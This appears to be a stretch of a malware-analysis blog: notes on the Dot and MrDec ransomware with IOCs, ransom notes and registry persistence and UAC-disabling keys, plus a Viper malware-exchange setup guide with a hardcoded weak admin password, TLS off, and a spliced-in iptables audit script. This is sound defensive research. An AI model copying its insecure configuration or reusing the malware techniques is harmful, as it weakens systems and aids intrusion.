<p><center><img alt="IDR Symbols" src="https://dissectingmalwa.re/img/dot-idc.png"></center></p>
<p><br/></p>
<p>After copying the two Dhrake scripts into your ghidra_scripts folder (e.g. ~/ghidra_scripts) you can refresh the list in the Script Manager once and switch to the Delphi Category. Run DhrakeInit and select the IDC file you created earlier.</p>
<p><center><img alt="Ghidra Script Manager DhrakeInit" src="https://dissectingmalwa.re/img/dot-load.png"></center></p>
<p><br/></p>
<p>Filtering for "VMT" in the Symbol Tree gives you all the Symbols relevant to Dhrake. Just click the Name in the Listing view once and run DhrakeParseClass (set the checkbox "In Tool" and press F8 to run). The Script will now automatically create the corresponding class and vtable struct.</p>
<p><center><img alt="Ghidra Classes" src="https://dissectingmalwa.re/img/dot-classes.png"></center></p>
<p><br/></p>
<p>So I guess we should continue with the analysis now :D As 90% of ransomware strains do "Dot" will read the Keyboard Layout as well. <em>GetKeyboardLayout(0)</em> returning 7 would be equivalent to a Japanese Keyboard Layout (wtf?). Passing 1 to GetKeyboardType will return the Subtype which is OEM specific, but will tell you how many function keys there are. Weird. Here's the <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getkeyboardtype">Documentation</a>.</p>
<p><center><img alt="KB Detection" src="https://dissectingmalwa.re/img/dot-keyboard.png"></center></p>
<p><br/></p>
<p>Dot also queries the current cursor position on the screen and passes it on to another function. Haven't investigated further yet.</p>
<p><center><img alt="Cursor Position" src="https://dissectingmalwa.re/img/dot-cursor.png"></center></p>
<p><br/></p>
<p>Here we are again: weird DLLs that may or may not be a UAC Bypass. UACme mentions two Methods (#21 and #22) employing comctl32.dll. Unsure what to make of this at the moment.</p>
<p><center><img alt="DLL" src="https://dissectingmalwa.re/img/dot-dll.png"></center></p>
<p><br/></p>
<p>In one of the scenarios I ran Regshot to see whether the ransomware adds/modifies/deletes registry keys, but there weren't any changes that I can attribute to it. Dot tries to read the <em>FPUMaskValue</em> under <em>SOFTWARE\Borland\Delphi\RTL</em>.</p>
<p><center><img alt="Registry Keys" src="https://dissectingmalwa.re/img/dot-reg.png"></center></p>
<p>This is another work-in-progress article, as I've come down with the "Congress Flu", so check back in a few days for an update. Probably the most important thing this "report" is still missing is a look at the crypto implementation. A look at the imports reveals that it is not using the Windows Crypto API but rather a weird Delphi one. We'll see.</p>
<p><br/></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1107</em> --> File Deletion --> Defense Evasion</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1076</em> --> Remote Desktop Protocol --> Lateral Movement</p>
<p><br/></p>
<h2><em>IOCs</em></h2>
<h3>Dot Samples</h3>
<div class="highlight"><pre><span></span><span class="mi">01</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: bebf5c12e35029e21c9cca1da53eb43e893f9521435a246ea991bcced2fabe67</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">768</span><span class="p">:</span><span class="n">Qa8bmv7hNAMbgYT6hQdPLC7TasOKS</span><span class="o">/</span><span class="mi">3</span><span class="n">U7fzd4tA9yenQ779Zo2lPnoCLnS9QtRbY</span><span class="p">:</span><span class="n">Ebmvs71</span><span class="o">+</span><span class="n">DKoKS</span><span class="o">/</span><span class="n">kjzdfrQty2lPnoqS9X</span>
<span class="mi">01</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: aa85b2ec79bc646671d7280ba27f4ce97e8fabe93ab7c97d0fd18d05bab6df29</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">98304</span><span class="p">:</span><span class="n">mt</span><span class="o">+</span><span class="n">HWV4nwA</span><span class="o">+</span><span class="mi">8</span><span class="n">PgzCRfjMlFBiZhfcrQSav</span><span class="o">//</span><span class="n">dH768QyO4YXoftvFUmgaJml9iUybR</span><span class="p">:</span><span class="n">NddPgzC</span><span class="o">+</span><span class="n">lFkZhER6</span><span class="o">/</span><span class="n">t</span><span class="o">+</span><span class="n">Hyr4A9FUmVJm</span><span class="o">+</span>
<span class="n">unpacked</span><span class="p">:</span>
<span class="mi">01</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 814e061d2e58720a43bcb3fe0478a8088053f0a407e25ff84fb98850d128f81c</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">1536</span><span class="p">:</span><span class="n">CCq2EikJZdZ529nEaqQOyergddb6apjAwzHx4D</span><span class="p">:</span><span class="mi">7</span><span class="n">IZYxEHJrIdFjAwzHx4</span>
</pre></div>
<h3>Registry Changes</h3>
<p>Inconclusive, as Regshot didn't show anything suspicious, only Delphi-related keys at most.</p>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="n">recover_24_7</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre><span></span><span class="k">If</span> <span class="nv">you</span> <span class="nv">want</span> <span class="nv">to</span> <span class="k">return</span> <span class="nv">your</span> .[<span class="nv">REDACTED</span>: <span class="k">random</span> <span class="mi">8</span><span class="o">-</span><span class="nv">letter</span> <span class="nv">lowercase</span> <span class="nv">extension</span>] <span class="nv">files</span>, <span class="nv">contact</span> <span class="nv">us</span> <span class="nv">and</span> <span class="nv">we</span> <span class="nv">will</span> <span class="k">send</span> <span class="nv">you</span> <span class="nv">a</span> <span class="nv">decryptor</span> <span class="nv">and</span> <span class="nv">a</span> <span class="nv">unique</span> <span class="nv">decryption</span> <span class="nv">key</span>.
<span class="nv">recover_24_7</span>@<span class="nv">protonmail</span>[.]<span class="nv">com</span>
<span class="nv">All</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">have</span> <span class="nv">been</span> <span class="nv">encrypted</span><span class="o">!</span>
<span class="nv">Your</span> <span class="nv">personal</span> <span class="nv">identifier</span>:
<span class="o">===========================================================================================</span>
<span class="o">-------------------------------------------------------------------------------------------</span>
[<span class="nv">REDACTED</span>: <span class="mi">606</span><span class="o">-</span><span class="nv">digit</span> <span class="nv">numeric</span> <span class="nv">ID</span>]
<span class="o">-------------------------------------------------------------------------------------------</span>
<span class="o">===========================================================================================</span>
</pre></div>
<p><br/></p>
<h2>Setting up a Malware Exchange for 36C3 with Viper</h2>
<p>Published 2019-12-25 by f0wL (tag:dissectingmalwa.re,2019-12-25:/setting-up-a-malware-exchange-for-36c3-with-viper.html)</p>
<p>Since my original project for 36c3 (something with Chinese gear and coreboot) didn't really work out in time I had an even better idea: setting up a Malware Sample Exchange.</p>
<p>After checking the projects and self-organized Sessions I couldn't find anything related to Malware Research or a place to discuss reverse engineering (besides CTF maybe), so with the "Malware XCHG" I want to create a place for attendees to share malicious binaries and discuss them at the same time.</p>
<p>To host this project at the <a href="https://mysteryhack.space">MysteryHack</a> Assembly I wanted to use a small but capable enough machine which is why I used the Intel NUC NUC7I3BNH that I had lying around at the time. Of course the box has to be isolated from the congress network so everyone interested will have to plug in via Ethernet over a switch. At first I wanted to set up a Cuckoo Sandbox instance, but because of a lack of time and computing resources the <a href="https://viper.li/en/latest/">Viper Framework</a> became the tool of choice.</p>
<p><center><img alt="Title Picture" width="600px" height="350px" src="https://dissectingmalwa.re/img/xchg-title.jpg"></center></p>
<p><br/></p>
<p>Viper is available on Github:</p>
<p><center><a href="https://github.com/viper-framework/viper">github.com/viper-framework/viper</a></center></p>
<p></br></p>
<p>The first thing we should do is install all the dependencies viper requires to run properly.</p>
<div class="highlight"><pre><span></span><span class="n">sudo</span> <span class="n">apt</span> <span class="n">install</span> <span class="n">git</span> <span class="n">build</span><span class="o">-</span><span class="n">essential</span> <span class="n">python3</span> <span class="n">python3</span><span class="o">-</span><span class="n">dev</span> <span class="n">python3</span><span class="o">-</span><span class="n">pip</span> <span class="n">exiftool</span> <span class="n">clamav</span><span class="o">-</span><span class="n">daemon</span> <span class="n">tor</span> <span class="n">libdpkg</span><span class="o">-</span><span class="n">perl</span> <span class="n">libssl</span><span class="o">-</span><span class="n">dev</span> <span class="n">swig</span> <span class="n">libffi</span><span class="o">-</span><span class="n">dev</span> <span class="n">ssdeep</span> <span class="n">libfuzzy</span><span class="o">-</span><span class="n">dev</span> <span class="n">unrar</span> <span class="n">p7zip</span><span class="o">-</span><span class="k">full</span>
</pre></div>
<p><br/></p>
<p>And because installing dependencies is fun let's install some more! This time we'll take care of the necessary Python modules.</p>
<p><code>sudo pip3 install olefile pdftools pypdns pydeep virustotal-api yara pefile scrapy</code></p>
<p><br/></p>
<p><center><img alt="Logo" width="300px" height="150px" src="https://dissectingmalwa.re/img/xchg-depend.jpg"></center></p>
<p><br/></p>
<p>And a custom module for the viper-framework:</p>
<p><code>sudo pip3 install git+https://github.com/sebdraven/verify-sigs.git</code></p>
<p><br/></p>
<p>After that is done we can finally install the viper-framework via pip:</p>
<p><code>sudo pip3 install viper-framework</code></p>
<p><br/></p>
<p>Running <code>viper</code> for the first time will create a folder called <strong>.viper</strong> in your home directory. This is where all the files, databases, notes etc. are saved.</p>
<p>And let's not forget the django Webinterface for viper:</p>
<div class="highlight"><pre><span></span><span class="n">cd</span> <span class="p">.</span><span class="n">viper</span>
<span class="n">git</span> <span class="n">clone</span> <span class="n">https</span><span class="p">:</span><span class="o">//</span><span class="n">github</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">jdsnape</span><span class="o">/</span><span class="n">viper</span><span class="o">-</span><span class="n">web</span><span class="p">.</span><span class="n">git</span>
<span class="n">cd</span> <span class="n">viper</span><span class="o">-</span><span class="n">web</span>
<span class="p">.</span><span class="o">/</span><span class="n">viper</span><span class="o">-</span><span class="n">web</span>
</pre></div>
<p>Of course viper-web has some dependencies as well: </p>
<p><code>sudo pip3 install -r requirements.txt</code></p>
<p><br/></p>
<p>Next we have to configure the web interface in <em>viper.conf</em>, located in <em>.viper</em>:</p>
<p>Scroll down to the <em>[web]</em> section and define a user/password combo and the host + port settings. I chose Port 4434 and 0.0.0.0 as the host to make it reachable for connecting devices.</p>
<div class="highlight"><pre><span></span><span class="k">[web]</span>
<span class="na">host</span> <span class="o">=</span> <span class="s">0.0.0.0</span>
<span class="na">port</span> <span class="o">=</span> <span class="s">4434</span>
<span class="na">tls</span> <span class="o">=</span> <span class="s">False</span>
<span class="na">certificate</span> <span class="o">=</span>
<span class="na">key</span> <span class="o">=</span>
<span class="na">admin_username</span> <span class="o">=</span> <span class="s">ccc</span>
<span class="na">admin_password</span> <span class="o">=</span> <span class="s">malwarexchg</span>
</pre></div>
<p>Finally we can run <em>./viper-web</em> to start up viper and the django server.</p>
<p><center><img alt="Django Server" src="https://dissectingmalwa.re/img/xchg-server.png"></center></p>
<p><br/></p>
<p>One last step to get it operational: Setting up networking and iptables sorta correctly. (I locked myself out twice while writing this, so ideally you want to have physical access to the machine whilst installing this).</p>
<p>The following screenshot shows the netplan config I'm using.</p>
<p><center><img alt="Netplan config" src="https://dissectingmalwa.re/img/xchg-net.png"></center></p>
<p><br/></p>
<p>And here's a short excerpt from my iptables rules. (I'm using iptables-persistent)</p>
<div class="highlight"><pre><span></span><span class="k">Chain</span> <span class="k">INPUT</span> <span class="p">(</span><span class="n">policy</span> <span class="n">ACCEPT</span> <span class="mi">0</span> <span class="n">packets</span><span class="p">,</span> <span class="mi">0</span> <span class="n">bytes</span><span class="p">)</span>
<span class="n">pkts</span> <span class="n">bytes</span> <span class="n">target</span> <span class="n">prot</span> <span class="n">opt</span> <span class="k">in</span> <span class="k">out</span> <span class="k">source</span> <span class="n">destination</span>
<span class="mi">330</span> <span class="mi">24289</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere tcp dpt:ssh</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any localhost/8 anywhere tcp dpt:ssh</span>
<span class="mi">337</span> <span class="mi">35307</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere tcp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any localhost/8 anywhere tcp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">udp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere udp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">udp</span> <span class="c1">-- any any localhost/8 anywhere udp dpt:4434</span>
<span class="mi">552</span> <span class="mi">41468</span> <span class="n">ACCEPT</span> <span class="k">all</span> <span class="c1">-- lo any anywhere anywhere</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">REJECT</span> <span class="k">all</span> <span class="c1">-- any any anywhere anywhere reject-with icmp-port-unreachable</span>
<span class="k">Chain</span> <span class="k">FORWARD</span> <span class="p">(</span><span class="n">policy</span> <span class="n">ACCEPT</span> <span class="mi">0</span> <span class="n">packets</span><span class="p">,</span> <span class="mi">0</span> <span class="n">bytes</span><span class="p">)</span>
<span class="n">pkts</span> <span class="n">bytes</span> <span class="n">target</span> <span class="n">prot</span> <span class="n">opt</span> <span class="k">in</span> <span class="k">out</span> <span class="k">source</span> <span class="n">destination</span>
<span class="k">Chain</span> <span class="k">OUTPUT</span> <span class="p">(</span><span class="n">policy</span> <span class="n">ACCEPT</span> <span class="mi">965</span> <span class="n">packets</span><span class="p">,</span> <span class="mi">602</span><span class="n">K</span> <span class="n">bytes</span><span class="p">)</span>
<span class="n">pkts</span> <span class="n">bytes</span> <span class="n">target</span> <span class="n">prot</span> <span class="n">opt</span> <span class="k">in</span> <span class="k">out</span> <span class="k">source</span> <span class="n">destination</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere tcp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">udp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere udp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any localhost/8 anywhere tcp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">udp</span> <span class="c1">-- any any localhost/8 anywhere udp dpt:4434</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any localhost/8 anywhere tcp dpt:ssh</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">ACCEPT</span> <span class="n">tcp</span> <span class="c1">-- any any 192.168.42.0/24 anywhere tcp dpt:ssh</span>
<span class="mi">0</span> <span class="mi">0</span> <span class="n">REJECT</span> <span class="k">all</span> <span class="c1">-- any any anywhere anywhere reject-with icmp-port-unreachable</span>
</pre></div>
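<p>Since the box is supposed to be isolated and the post mentions locking oneself out twice, here is an added example (my own script, not part of the original post) that parses <code>iptables -L -v</code> output like the excerpt above, with or without <code>-n</code>, and checks the intended policy: ACCEPT only for SSH and the viper-web port 4434, only from 192.168.42.0/24, loopback or the lo interface, and a catch-all REJECT at the end of every chain whose default policy is ACCEPT. The embedded ruleset is constructed from the INPUT chain above plus one deliberately bad rule; the subnet and port are taken from the post.</p>

```python
"""Check that the Malware XCHG box's iptables ruleset really isolates it.

Parses the output of `iptables -L -v` (the format shown in the post) or
`iptables -L -v -n` and verifies the intended policy: ACCEPT only for SSH and
the viper-web port 4434, only from the lab subnet 192.168.42.0/24, loopback or
the lo interface, and every chain with policy ACCEPT must end in a catch-all
REJECT/DROP, otherwise the default policy quietly lets everything through.
"""
import re

# Policy taken from the post; adjust to your own lab subnet and web port.
ALLOWED_SOURCES = {"192.168.42.0/24", "127.0.0.0/8"}
ALLOWED_DPORTS = {"22", "4434"}
TRUSTED_IFACES = {"lo"}
DENY_TARGETS = {"REJECT", "DROP"}
# `iptables -L -v` resolves names, `-n` prints numbers; map names to numbers.
NAMES = {"anywhere": "0.0.0.0/0", "localhost/8": "127.0.0.0/8", "ssh": "22"}

CHAIN_RE = re.compile(r"^Chain (\S+) \(policy (\S+)")
COUNTER_RE = re.compile(r"^\d+[KMGT]?$")  # pkts/bytes columns, e.g. 330 or 602K

# Constructed sample: the INPUT chain from the post plus one deliberately bad
# rule (4434 reachable from anywhere), and the empty FORWARD chain.
SAMPLE = """\
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target prot opt in out source destination
  330 24289 ACCEPT tcp -- any any 192.168.42.0/24 anywhere tcp dpt:ssh
    0     0 ACCEPT tcp -- any any localhost/8 anywhere tcp dpt:ssh
  337 35307 ACCEPT tcp -- any any 192.168.42.0/24 anywhere tcp dpt:4434
    0     0 ACCEPT udp -- any any localhost/8 anywhere udp dpt:4434
  552 41468 ACCEPT all -- lo any anywhere anywhere
    0     0 ACCEPT tcp -- any any anywhere anywhere tcp dpt:4434
    0     0 REJECT all -- any any anywhere anywhere reject-with icmp-port-unreachable
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target prot opt in out source destination
"""


def parse_iptables(text):
    """Return {chain: {"policy": str, "rules": [rule dicts]}} from `iptables -L -v [-n]` output."""
    chains, current = {}, None
    for line in text.splitlines():
        m = CHAIN_RE.match(line)
        if m:
            current = m.group(1)
            chains[current] = {"policy": m.group(2), "rules": []}
            continue
        f = line.split()
        # Skip the column header and blank lines; rule lines start with the packet counter.
        if current is None or len(f) < 9 or not COUNTER_RE.match(f[0]):
            continue
        dport = None
        for tok in f[9:]:
            if tok.startswith("dpt:"):
                dport = NAMES.get(tok[4:], tok[4:])
        chains[current]["rules"].append({
            "target": f[2], "prot": f[3], "in": f[5], "out": f[6],
            "src": NAMES.get(f[7], f[7]), "dst": NAMES.get(f[8], f[8]), "dport": dport,
        })
    return chains


def audit(chains):
    """Return a list of findings; an empty list means the isolation policy holds."""
    findings = []
    for name, chain in chains.items():
        rules = chain["rules"]
        for i, r in enumerate(rules, 1):
            if r["target"] != "ACCEPT" or r["in"] in TRUSTED_IFACES:
                continue
            if r["src"] not in ALLOWED_SOURCES:
                findings.append(f"{name} rule {i}: ACCEPT from untrusted source {r['src']}")
            if r["dport"] is None:
                findings.append(f"{name} rule {i}: ACCEPT without a destination port")
            elif r["dport"] not in ALLOWED_DPORTS:
                findings.append(f"{name} rule {i}: ACCEPT on unexpected port {r['dport']}")
        # A chain whose policy is ACCEPT is only closed by a trailing deny-everything rule.
        last = rules[-1] if rules else None
        closed = chain["policy"] in DENY_TARGETS or (
            last is not None and last["target"] in DENY_TARGETS
            and last["src"] == "0.0.0.0/0" and last["prot"] == "all")
        if not closed:
            findings.append(f"{name}: policy {chain['policy']} and no catch-all REJECT/DROP rule")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_iptables(SAMPLE)) or ["no findings"]:
        print(finding)
```

Run it against the live box with <code>sudo iptables -L -v | python3 check_rules.py</code> by replacing SAMPLE with <code>sys.stdin.read()</code>; the empty FORWARD chain in the post's own output shows up as a finding because its policy is ACCEPT.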
<p><br/></p>
<h2><strong>Update 27.12.2019:</strong></h2>
<p>Here is a photo of the Project at 36c3 in Leipzig</p>
<p><center><img alt="Setup at 36c3" src="https://dissectingmalwa.re/img/xchg-setup.jpg"></center></p>
<p><br/></p>
<h2><strong>Update 04.01.2020:</strong></h2>
<p>Thanks to everyone who shared samples at the Exchange and for the great conversations as well. See you all at 37c3 I guess :D</p>
<p>Here is a digest of all samples that were uploaded to the box by the end of Day 4:</p>
<p><br/></p>
<p>36c3-malwarexchg-part1.zip: <a href="https://malshare.com/sample.php?action=detail&hash=390dd9f3720d188d8e20271a0fbac7d3">> Malshare</a></p>
<p>36c3-malwarexchg-part2.zip: <a href="https://malshare.com/sample.php?action=detail&hash=412b9e9da6cfd920f725686136440acb">> Malshare</a></p>
<p>36c3-malwarexchg-part3.zip: <a href="https://malshare.com/sample.php?action=detail&hash=1447196091a1b5792811a694da2bdc65">> Malshare</a></p>
<p>FancyBear (archive too large for Malshare): <a href="https://www.hybrid-analysis.com/sample/e8c66fb64dd016aaba6a5e87341b73d0ee5844311bf0524fa74f203b7864a67c">> Hybrid Analysis</a></p>
<p>CozyBear (archive too large for Malshare): <a href="https://www.hybrid-analysis.com/sample/93644d338ddd66015d8787bb0477f37aa0e5ccc4642f819566a7c653fcc342a2">> Hybrid Analysis</a></p>
<h2>I literally can't think of a fitting pun - MrDec Ransomware</h2>
<p>Published 2019-12-23 by f0wL (tag:dissectingmalwa.re,2019-12-23:/i-literally-cant-think-of-a-fitting-pun-mrdec-ransomware.html)</p>
<p>I took notice of this Ransomware Family after a series of posts in the Bleeping Computer Forum.</p>
<p>It employs techniques that are not seen very often in other ransomware samples, so the Analysis is actually quite difficult, but I'm hoping reading this is at least a bit interesting.</p>
<p><center><img alt="Logo" height="256px" width="256px" src="https://dissectingmalwa.re/img/mrdec-logo.png"></center></p>
<h2>Work in Progress</h2>
<p>Because Christmas and 36c3 are coming up in the next few days I might have to push this analysis back a bit.</p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>MrDec @ <a href="https://app.any.run/tasks/f4677b72-5c32-4d65-8572-51365ebe8e32">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/a700f9ced75c4143da6c4d1e09d6778e84ff570ea7d297fc130a0844e56c96ad/details">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/a700f9ced75c4143da6c4d1e09d6778e84ff570ea7d297fc130a0844e56c96ad?environmentId=120">HybridAnalysis</a>
--> <code>sha256 a700f9ced75c4143da6c4d1e09d6778e84ff570ea7d297fc130a0844e56c96ad</code></p>
<p></br></p>
<p>Let's see what we're dealing with here and fire up Detect it easy:</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/mrdec-die.png"></center></p>
<p><br/></p>
<p><center><img alt="Entropy Graph" src="https://dissectingmalwa.re/img/mrdec-entropy.png"></center></p>
<p><br/></p>
<p>The Ransomnote is delivered via a <em>.hta</em> file. Like most other strains active in the last few months the criminals use two E-Mail addresses: a "primary" and a "backup". In this case they are using Protonmail and AOL, which has been kind of a pattern for them (Tutanota is their third preferred service; a list of previously used mailboxes is available down below in the IOCs Section).</p>
<p><center><img alt="Ransomnote in mshta/IE" src="https://dissectingmalwa.re/img/mrdec-ransomnote.png"></center></p>
<p><br/></p>
<p>Opening the note in another browser (Chrome in this case) won't show the instructions but a countdown timer. In most cases the victim won't be able to see the timer, because the note is rendered by Internet Explorer, where scrolling is disabled :D</p>
<p><center><img alt="Ransomnote in Chrome" src="https://dissectingmalwa.re/img/mrdec-note2.png"></center></p>
<p><br/></p>
<p><center><img alt="Ransomnote in Chrome" src="https://dissectingmalwa.re/img/mrdec-notecode.png"></center></p>
<p><br/></p>
<p><center><img alt="x32dbg" src="https://dissectingmalwa.re/img/mrdec-x32dbg.png"></center></p>
<p><br/></p>
<p><center><img alt="Running it twice" src="https://dissectingmalwa.re/img/mrdec-2nd.png"></center></p>
<p><br/></p>
<p><center><img alt="Imports of the binary" src="https://dissectingmalwa.re/img/mrdec-imports.png"></center></p>
<p><br/></p>
<p><center><img alt="Imports of the binary" src="https://dissectingmalwa.re/img/mrdec-processgraph.png"></center></p>
<p><br/></p>
<p><center><img alt="Windows Crypto API" src="https://dissectingmalwa.re/img/mrdec-winapi.png"></center></p>
<p><br/></p>
<p><center><img alt="Windows Crypto API" src="https://dissectingmalwa.re/img/mrdec-winapi2.png"></center></p>
<p><br/></p>
<p><center><img alt="File Encryption Routine" src="https://dissectingmalwa.re/img/mrdec-cryptencrypt.png"></center></p>
<p><br/></p>
<p><center><img alt="Clearing the Memory" src="https://dissectingmalwa.re/img/mrdec-zeromem.png"></center></p>
<p><br/></p>
<p><center><img alt="Connected Drives" src="https://dissectingmalwa.re/img/mrdec-drives.png"></center></p>
<p><br/></p>
<p>In the following screenshot you can see the "Process Killing" routine of MrDec.</p>
<p><center><img alt="Process Kill Routine" src="https://dissectingmalwa.re/img/mrdec-processkill.png"></center></p>
<p><br/></p>
<p>Last but not least we have a weird discovery. </p>
<p><center><img alt="clop?" src="https://dissectingmalwa.re/img/mrdec-clop.png"></center></p>
<p><br/></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1060</em> --> Registry Run Keys / Start Folder --> Persistence</p>
<p><em>T1055</em> --> Process Injection --> Privilege Escalation</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1055</em> --> Process Injection --> Defense Evasion</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1112</em> --> Modify Registry --> Defense Evasion</p>
<p><em>T1107</em> --> File Deletion --> Defense Evasion</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1057</em> --> Process Discovery --> Discovery</p>
<p><em>T1076</em> --> Remote Desktop Protocol --> Lateral Movement</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>MrDec</h3>
<div class="highlight"><pre><span></span><span class="n">searchfiles</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: a700f9ced75c4143da6c4d1e09d6778e84ff570ea7d297fc130a0844e56c96ad </span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">192</span><span class="p">:</span><span class="n">QEsTzSIs3HIuvipDu3uTtKTzTwmH</span><span class="o">+</span><span class="n">STs8fpgiRHIYGL4vKrGoO</span><span class="p">:</span><span class="n">QE0JoapKeTtKTz8s</span><span class="o">+</span><span class="n">S48h5dIYxK</span>
</pre></div>
<h3>Registry Keys</h3>
<div class="highlight"><pre><span></span><span class="n">HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Run</span><span class="w"></span>
<span class="n">unlock</span><span class="w"> </span><span class="c1">--> "c:\Decoding help.hta"</span>
<span class="n">searchfiles</span><span class="w"> </span><span class="c1">--> C:\windows\searchfiles.exe</span>
<span class="n">HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="nc">DateTime</span><span class="w"></span>
<span class="n">orsa</span><span class="w"> </span><span class="c1">--> [hex blob omitted: CryptoAPI PUBLICKEYBLOB holding a 2048-bit RSA public key]</span>
<span class="n">rsa</span><span class="w"> </span><span class="c1">--> [value not recoverable from the source]</span>
<span class="n">HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Policies</span><span class="err">\</span><span class="k">System</span><span class="w"></span>
<span class="n">PromptOnSecureDesktop</span><span class="w"> </span><span class="c1">--> 0</span>
<span class="n">EnableLUA</span><span class="w"> </span><span class="c1">--> 0</span>
<span class="n">ConsentPromptBehaviorAdmin</span><span class="w"> </span><span class="c1">--> 0</span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOzv5ecUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="w"></span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="p">.</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="w"> </span><span class="c1">--> HKEY_CLASSES_ROOT\[ID]PFOBHpZYUnxnfV9F[ID]_auto_file</span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="err">\</span><span class="n">shell</span><span class="err">\</span><span class="k">open</span><span class="err">\</span><span class="n">command</span><span class="w"> </span><span class="c1">--> %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1</span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="err">\</span><span class="n">shell</span><span class="err">\</span><span class="k">open</span><span class="err">\</span><span class="n">DropTarget</span><span class="w"> </span><span class="c1">--> {FFE2A43C-56B9-4bf5-9A79-CC6D4285608A}</span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="err">\</span><span class="n">shell</span><span class="err">\</span><span class="k">open</span><span class="w"> </span><span class="c1">--> @photoviewer.dll,-3043</span>
